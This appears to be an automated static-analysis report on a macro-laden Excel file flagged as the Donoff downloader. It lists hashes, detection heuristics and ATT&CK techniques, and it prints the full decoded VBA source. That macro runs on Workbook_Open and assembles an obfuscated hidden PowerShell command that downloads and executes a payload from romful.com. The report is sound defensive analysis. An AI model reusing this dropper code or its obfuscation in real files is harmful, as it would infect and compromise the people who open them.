Donoff — Office (OLE) malware analysis

Static analysis result for SHA-256 c484128dd841e555…

MALICIOUS

Office (OLE)

57.5 KB Created: 2017-08-30 04:11:44 Authoring application: Microsoft Excel First seen: 2017-09-14
MD5: 322b82692918f84c7dd69f85c76679a8 SHA-1: d93f36cbc5f0b63f2f58b88d424fa5a9dac0d15c SHA-256: c484128dd841e555c87737e157687d7ce4939ffcfe9dadd4424cf4ab2f0443ed
210 Risk Score

Malware Insights

Donoff · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols

The Excel document contains VBA macros, including a Workbook_Open macro, that are obfuscated and designed to execute shell commands. The script attempts to download a payload from the URL http://romful.com/nero. This behavior is consistent with the Donoff family, which often uses macro-enabled documents to download and execute further malicious content.

Heuristics 6

  • ClamAV: Xls.Dropper.Donoff-6758222-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Donoff-6758222-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    If msoSortByNone > 1 Then
Shell trulalaa + """", O
End If
  • Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL
    VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
    Matched line in script
    If msoSortByNone > 1 Then
Shell trulalaa + """", O
End If
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
If msoSortByNone > 1 Then
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://romful.com/nero Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3440 bytes
SHA-256: 20748126847c19b9ce221ed4ed76daed7f9ac4116558a114eeefcc75872e5e7b
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function valtescott()
nasanasa = "O"
valtescott = "p" + "r" + nasanasa + "^" + "F"
End Function
Function trulalaa()
trulalaa = debiusius + "e   " + "/c """ + bookkeeper + derfooter
End Function






Function poltergeiis()
zafiraopel = Array(Now(), Null, "Y", Now(), Now(), Now(), Now(), Now())
poltergeiis = "  B^" + zafiraopel(2) + "p" + "a^S^" + "s "
End Function
Function derfooter()
derfooter = "$fos=''',''';$hit='dfil';$fd=');sta';$dr='(ne';$ed='ject ';$ipo='syst';$kos='t.we';$rem='ent).do';$sad"
derfooter = derfooter + "='wnloa';$kp='w-ob';$nim='e(''';$mo='De';$uy='fa';$ji='" + "ul" + "t.e" + "x';$" + "po" + "l='em." + "ne';$oe='e''';$jik='rt-p" + "ro';$naw='c" + "ess ''';$lim='bc" + "li';I" + "nv" + "oke-E" + "xp" + "ression($dr+$kp+$ed+$ipo+$pol+$kos+$lim+$rem+$sad+$hit+$nim+'http://romful.com/nero'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe)"
End Function
Function debiusius()
uliuusd = "ex"
flowerblacker = "CM to inches converter"
debiusius = Left(flowerblacker, 2) + "d." + uliuusd
End Function

Function bookkeeper()
niagararain = Array(Null, Null, Null, Day(Now), "^he" + "l^" + "l", Day(Now), Null, Null, Null, Null, Null, Null, Day(Now))
williamrally = Array(Null, Null, Null, Day(Now), Second(Now), Null, Null, Null, Second(Now), Null, Null, Null, Null, "^U", Null, Null)
jijiutsu = Array(Null, " ", Null, Timer(), Null, Minute(Now), "^" + "E" + "c", Null, Null, Now(), Null, Null, Null, Second(Now))
valkiriad = Array(Null, Null, Day(Now), "^ERS", Day(Now), Null, Null, Day(Now), Day(Now), Null)
shoppergoal = Array(Null, Day(Now), Null, Null, Null, Day(Now), Null, Null, Null, "w")
irregional = "O"
bookkeeper = "p" + "^" + irregional + Array(shoppergoal(9) + valkiriad(3) + niagararain(4) + poltergeystore + " -N" + "o" + valtescott + "I" + "l" + "e^" + "" + "  " + "-" + "e" + "X" + jijiutsu(6) + williamrally(13) & poltergeiis)(0)
End Function



Function poltergeystore()
hhneg = "D"
valeygod = Array(Day(Now), Second(Now), Null, Second(Now), Null, Day(Now), Null, Second(Now), Null, Day(Now), Null, Null, "s" + "^ 1", Null, Second(Now), Null, Null, Second(Now))
ganovey = Array(Day(Now), Null, Day(Now), "  -" + "W^" & "I" + "n", Null, Second(Now), Null, Second(Now), Null, Null, "-n" + "O^", Null, Second(Now), Null, Null, Second(Now))
poolnum = Array(Day(Now), Null, Second(Now), Day(Now), Null, Day(Now), Null, Second(Now), Null, Null, Null, Null, Second(Now), Null, Day(Now), "^N" + "i^N" + "t", Day(Now))
poltergeystore = "^.e^" + "x^e" + "^  " & ganovey(10) + "l -No" + poolnum(15) + Chr(94) + ganovey(3) + hhneg + "O^w" + valeygod(12)
End Function


Sub Workbook_Open()
If msoSortByNone > 1 Then
Shell trulalaa + """", O
End If
End Sub

Function gluerise()
gluerise = "the mirror"
gluerise = Left(gluerise, 2)
End Function



Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Open this report in the interactive analyzer, or submit your own file for analysis.